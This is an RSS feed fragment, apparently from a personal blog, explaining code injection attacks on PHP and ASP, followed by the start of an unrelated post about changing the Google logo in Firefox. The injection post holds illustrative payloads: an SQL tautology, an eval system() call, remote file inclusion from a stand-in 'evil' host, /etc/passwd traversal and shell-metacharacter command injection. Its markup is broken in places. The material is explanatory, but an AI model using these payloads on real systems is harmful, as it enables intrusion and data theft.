AND UserList.Password = &#39;password&#39; OR &#39;1&#39;=&#39;1&#39;&lt;/span&gt;&lt;/pre&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt; In the example above, &quot;Password&quot; is assumed to be blank or some innocuous string. &quot;&lt;code class=&quot;western&quot;&gt;&#39;1&#39;=&#39;1&#39;&lt;/code&gt;&quot; will always be true and many rows will be returned, thereby allowing access. TThe technique may be refined to allow multiple statements to run, or even to load up and run external programs.  &lt;/div&gt;&lt;h3 align=&quot;LEFT&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;PHP Injection-&lt;/span&gt;&lt;/h3&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;Dynamic_Evaluation_Vulnerabilities&quot;&gt;&lt;/a&gt; &quot;PHP Injection,&quot; &quot;ASP Injection,&quot; i&amp;gt;et cetera are terms coined which refer to various types of code injection attacks which allow an attacker to supply code to the server side scripting engine. In the case of &quot;PHP Injection,&quot; the server side scripting engine is &lt;a href=&quot;http://en.wikipedia.org/wiki/PHP&quot;&gt;PHP&lt;/a&gt;. IIn practice, PHP Injection is either the exploitation of &quot;Dynamic Evaluation Vulnerabilities,&quot; &quot;Include File Injection,&quot; or similar code injection vulnerabilities.  &lt;/div&gt;&lt;h3 align=&quot;LEFT&quot;&gt;Dynamic Evaluation Vulnerabilities-&lt;/h3&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;Dynamic_Evaluation_Vulnerabilities_-_Eval_Injection&quot;&gt;&lt;/a&gt; Steven M. Christey of a class=&quot;external text&quot; href=&quot;http://www.mitre.org/&quot; rel=&quot;nofollow&quot; title=&quot;http://www.mitre.org&quot;&amp;gt;mitre.org suggests this name for a class of code injection vulnerabilities.  &lt;/div&gt;&lt;h4 align=&quot;LEFT&quot;&gt;Dynamic Evaluation Vulnerabilities - &lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Eval Injection&lt;/span&gt;-&lt;/h4&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;cite_ref-1&quot;&gt;&lt;/a&gt;An eval injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an &lt;code class=&quot;western&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Eval&quot;&gt;eval&lt;/a&gt;()&lt;/code&gt; function call.&lt;a href=&quot;http://www.computerpapa.com/hacking/php+injection.aspx#cite_note-1&quot;&gt;[2]&lt;/a&gt; &lt;/div&gt;&lt;pre class=&quot;western&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;$myvar = &#39;somevalue&#39;; 
$x = $_GET[&#39;arg&#39;]; 
eval(&#39;$myvar = &#39; . $x . &#39;;&#39;);&lt;/span&gt;&lt;/pre&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt; &lt;a href=&quot;&quot; name=&quot;Dynamic_Evaluation_Vulnerabilities_-_Dynamic_Variable_Evaluation&quot;&gt;&lt;/a&gt; The argument of &quot;&lt;code class=&quot;western&quot;&gt;eval&lt;/code&gt;&quot; will be processed as PHP, so additional commands can be appended. For example, if &quot;arg&quot; is set to &quot;&lt;code class=&quot;western&quot;&gt;10; system(&#39;/bin/echo uh-oh&#39;)&lt;/code&gt;&quot;, additional code is run which executes a program on the server, in this case &quot;&lt;code class=&quot;western&quot;&gt;/bin/echo&lt;/code&gt;&amp;amp;&quot;. &lt;/div&gt;&lt;h4 align=&quot;LEFT&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Dynamic Evaluation Vulnerabilities - Dynamic Variable Evaluation&lt;/span&gt;&lt;/h4&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;As defined in a class=&quot;external text&quot; href=&quot;http://seclists.org/lists/fulldisclosure/2006/May/0035.html&quot; rel=&quot;nofollow&quot; title=&quot;http://seclists.org/lists/fulldisclosure/2006/May/0035.html&quot;&amp;gt;&quot;Dynamic Evaluation Vulnerabilities in PHP applications&quot;: PHP supports &quot;variable variables,&quot; which are variables or expressions that evaluate to the names of other variables [3]. They can be used to dynamically change which variable is accessed or set during execution of the program. This powerful and convenient feature is also dangerous. A number of applications have code such as the following:  &lt;/div&gt;&lt;pre class=&quot;western&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;$safevar = &quot;0&quot;; 
$param1 = &quot;&quot;; 
$param2 = &quot;&quot;; 
$param3 = &quot;&quot;; 
# my own &quot;register globals&quot; for param[1,2,3] 
foreach ($_GET as $key =&amp;gt; $value) { 
  $$key = $value; 
}&lt;/span&gt;&lt;/pre&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt; &lt;a href=&quot;&quot; name=&quot;Dynamic_Evaluation_Vulnerabilities_-_Dynamic_Function_Evaluation&quot;&gt;&lt;/a&gt; If the attacker provides &quot;&lt;code class=&quot;western&quot;&gt;safevar=bad&lt;/code&gt;&quot; in the query string, then &lt;code class=&quot;western&quot;&gt;$safevar&lt;/code&gt; will be set to the value &quot;bad&quot;.  &lt;/div&gt;&lt;h4 align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm; margin-top: 0cm;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Dynamic Evaluation Vulnerabilities - Dynamic Function Evaluation&lt;/span&gt;&lt;/h4&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;The following PHP-examples will execute a function specified by request.  &lt;/div&gt;&lt;pre class=&quot;western&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;$myfunc = $_GET[&#39;myfunc&#39;]; 
$myfunc();&lt;/span&gt;&lt;/pre&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; and:  &lt;/span&gt;&lt;/div&gt;&lt;pre class=&quot;western&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;$myfunc = $_GET[&#39;myfunc&#39;]; 
${&quot;myfunc&quot;}();;&lt;/span&gt;&lt;/pre&gt;&lt;h3 align=&quot;LEFT&quot;&gt; &lt;a href=&quot;&quot; name=&quot;Include_File_Injection&quot;&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Include File Injection&lt;/span&gt;&lt;/h3&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;Consider this PHP program (which includes a file specified by request): The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in &lt;code class=&quot;western&quot;&gt;COLOR&lt;/code&gt;, it is possible to inject code from files:  &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;code class=&quot;western&quot;&gt;/vulnerable.php?COLOR=&lt;/code&gt;&lt;code class=&quot;western&quot;&gt;&lt;b&gt;http://evil/exploit?&lt;/b&gt;&lt;/code&gt;  - injects a remotely hosted file containing an exploit.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;code class=&quot;western&quot;&gt;/vulnerable.php?COLOR=&lt;/code&gt;&lt;code class=&quot;western&quot;&gt;&lt;b&gt;C:\\ftp\\upload\\exploit&lt;/b&gt;&lt;/code&gt;  - Executes code from an already uploaded file called exploit.php   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;code class=&quot;western&quot;&gt;/vulnerable.php?COLOR=&lt;/code&gt;&lt;code class=&quot;western&quot;&gt;&lt;b&gt;../../../../../../../../etc/passwd&lt;/b&gt;&lt;/code&gt;  - allows an attacker to read the contents of the passwd file on a  UNIX system &lt;a href=&quot;http://en.wikipedia.org/wiki/Directory_traversal&quot;&gt;directory  traversal&lt;/a&gt;.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;code class=&quot;western&quot;&gt;/vulnerable.php?COLOR=&lt;/code&gt;&lt;code class=&quot;western&quot;&gt;&lt;b&gt;C:\\notes.txt&lt;/b&gt;&lt;/code&gt;  - example using &lt;a href=&quot;http://en.wikipedia.org/wiki/Null_character&quot;&gt;NULL&lt;/a&gt;  &lt;a href=&quot;http://en.wikipedia.org/wiki/Meta_character&quot;&gt;meta character&lt;/a&gt;  to remove the &lt;code class=&quot;western&quot;&gt;.php&lt;/code&gt; suffix, allowing  access to other files than .php. (PHP setting &quot;magic_quotes_gpc  = On&quot;, which is default, would stop this attack)   &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;h3 align=&quot;LEFT&quot;&gt;&lt;a href=&quot;&quot; name=&quot;Shell_Injection&quot;&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Shell Injection&lt;/span&gt;&lt;/h3&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;Shell Injection is named after a href=&quot;http://en.wikipedia.org/wiki/Unix_shell&quot; title=&quot;Unix shell&quot;&amp;gt;Unix shells, but applies to most systems which allows software to programmatically execute &lt;a href=&quot;http://en.wikipedia.org/wiki/Command_line&quot;&gt;command line&lt;/a&gt;. Typical sources of Shell Injection is calls &lt;code class=&quot;western&quot;&gt;system()&lt;/code&gt;, &lt;code class=&quot;western&quot;&gt;StartProcess()&lt;/code&gt;, &lt;code class=&quot;western&quot;&gt;java.lang.Runtime.exec()&lt;/code&gt;, &lt;code class=&quot;western&quot;&gt;System.Diagnostics.Process.Start()&lt;/code&gt; and similar APIs. Consider the following short PHP program, which runs an external program called &lt;b&gt;funnytext&lt;/b&gt; to replace a word the user sent with some other word) This program can be injected in multiple ways:  &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;`command`&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; will execute &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;.   &lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;$(command)&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; will execute &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;.   &lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;; command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; will execute &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;, and  output result of command.   &lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;| command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; will execute &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;, and  output result of command.   &lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;&amp;amp;&amp;amp; command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; will execute &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;,  and output result of command.   &lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;|| command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; will execute &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;command&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;, and  output result of command.   &lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;&amp;gt; /home/user/phpguru/.bashrc&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; will  overwrite file &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;.bashrc&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;.   &lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;&amp;lt;  /home/user/phpguru/.bashrc&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; will send file &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;.bashrc&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt; as  input to &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;funnytext&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;.   &lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;PHP offers &lt;code class=&quot;western&quot;&gt;&lt;a href=&quot;http://www.php.net/manual/en/function.escapeshellarg.php&quot;&gt;escapeshellarg()&lt;/a&gt;&lt;/code&gt; and &lt;code class=&quot;western&quot;&gt;&lt;a href=&quot;http://www.php.net/manual/en/function.escapeshellcmd.php&quot;&gt;escapeshellcmd()&lt;/a&gt;&lt;/code&gt; to perform &lt;b&gt;encoding&lt;/b&gt; before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.  &lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;HTML/Script Injection (Cross Site Scripting)-&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;dl&gt;&lt;dd style=&quot;margin-bottom: 0.5cm; text-align: left;&quot;&gt;&lt;i&gt;Main article:  &lt;a href=&quot;http://en.wikipedia.org/wiki/Cross-site_scripting&quot;&gt;Cross-site  scripting&lt;/a&gt;&lt;/i&gt;&lt;/dd&gt;&lt;/dl&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt; &lt;a href=&quot;&quot; name=&quot;HTML_Injection_in_IE7_Via_Infected_DLL&quot;&gt;&lt;/a&gt;HTML/Script Injection is a popular subject, commonly termed &quot;Cross Site Scripting&quot;, or &quot;XSS&quot;. XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the outputted HTML, without being checked for HTML code or scripting. The two basic types are as follows: Active (Type 1) This type of XSS flaw is less dangerous, as the user input is placed into a dynamically generated page. No changes are made on the server. Passive (Type 2) This type is more dangerous, as the input is written to a static page, and as such, is persistent.  &lt;/div&gt;&lt;h4 align=&quot;LEFT&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt; HTML Injection in IE7 Via Infected DLL-&lt;/span&gt;&lt;/h4&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;cite_ref-2&quot;&gt;&lt;/a&gt;&lt;a href=&quot;&quot; name=&quot;ASP_Injection&quot;&gt;&lt;/a&gt; According to an article&lt;a href=&quot;http://www.computerpapa.com/hacking/php+injection.aspx#cite_note-2&quot;&gt;[3]&lt;/a&gt; in UK tech site &#39;The Register&#39;, HTML injection can also occur if the user has an infected DLL on their system. The article quotes Roger Thompson who claims that &quot;the victims&#39; browsers are, in fact, visiting the PayPal website or other intended URL, but that a dll file that attaches itself to IE is managing to read and modify the html while in transit. The article mentions a phishing attack using this attack that manages to bypass IE7 and Symantec&#39;s attempts to detect suspicious sites.  &lt;/div&gt;&lt;h3 align=&quot;LEFT&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;ASP Injection-&lt;/span&gt;&lt;/h3&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;Analogy&quot;&gt;&lt;/a&gt;&quot;ASP Injection&quot;, &quot;PHP Injection&quot; i&amp;gt;etc. are terms coined which refer to various types of code injection attacks which allow an attacker to supply code to the server side scripting engine. In the case of &quot;ASP Injection&quot;, the server side scripting engine is Microsoft &lt;a href=&quot;http://en.wikipedia.org/wiki/Active_Server_Pages&quot;&gt;Active Server Pages&lt;/a&gt;, an add-on to Microsoft IIS. In practice, ASP Injection is either the exploitation of &lt;b&gt;Dynamic Evaluation Vulnerabilities&lt;/b&gt;, &lt;b&gt;Include File Injection&lt;/b&gt; or similar code injection vulnerabilities. Example: IIn this example, the user is able to insert a command instead of a username. Analogy Code injection is an error in interpretation. Similar interpretation errors exist out side of the world of computer science such as the comedy routine &lt;a href=&quot;http://en.wikipedia.org/wiki/Who%27s_on_First%253F&quot;&gt;Who&#39;s on First?/a&amp;gt; . This conversation was property validated by this quote:&lt;/a&gt;&lt;/div&gt;&lt;blockquote style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Who%27s_on_First%253F&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&quot;Not the pronoun but a player with the unlikely name of Who, is on first&quot; &lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt; &lt;/span&gt;&lt;/blockquote&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/01/php-injection.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAyInOtKkMmN17oD4gQ4KJMOykL4gE6MIw4e8Z0dyFN0eKrwAsZjHwJruv76-e9XgYGcDi9Il4myR3X5y80vRKIQf5xNEtV2fb5WHsELnDXCcq2YM-Mtqy2DabeOkIfk8vh0JZoJCpg_0/s72-c/images.jpeg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-6052344328101672080</guid><pubDate>Thu, 09 Dec 2010 10:10:00 +0000</pubDate><atom:updated>2011-03-25T09:30:43.728-07:00</atom:updated><title>Change Google logo text to Your Name-</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;How to Change Google Doodle with your Own Text? -&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbBdlN6ogvedoQVmuFj49KgjucFG2keLjHv5LKccolGsPYpoOfJvhMB3tQIUIN3qF3ZLc_aGdqOHKX9SB_UUPH4hRyl0wWH5jdvcEt-et9RgdFDP4nIzyumHJJlfHvH3Vnsi6932Jn7ws/s1600/Screenshot-1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbBdlN6ogvedoQVmuFj49KgjucFG2keLjHv5LKccolGsPYpoOfJvhMB3tQIUIN3qF3ZLc_aGdqOHKX9SB_UUPH4hRyl0wWH5jdvcEt-et9RgdFDP4nIzyumHJJlfHvH3Vnsi6932Jn7ws/s320/Screenshot-1.png&quot; width=&quot;430&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;How would you like to &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;replace&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; the &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;text-decoration: line-through;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;boring&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Google Text  Logo with your own name&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; or any names that look appealing to  you? It really looks cool to me, now there is &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;no more Google  Logo Text in my firefox browser&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;. What’s I have now is the &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: magenta;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Amit Tyagi Search Engine&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;!! LOL!&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;If you find this trick looks really cool, here’s how to make your own  Google Logo Text. &lt;span id=&quot;more-120&quot;&gt;&lt;/span&gt;Please note that this  trick only &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;apply for firefox browser&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: 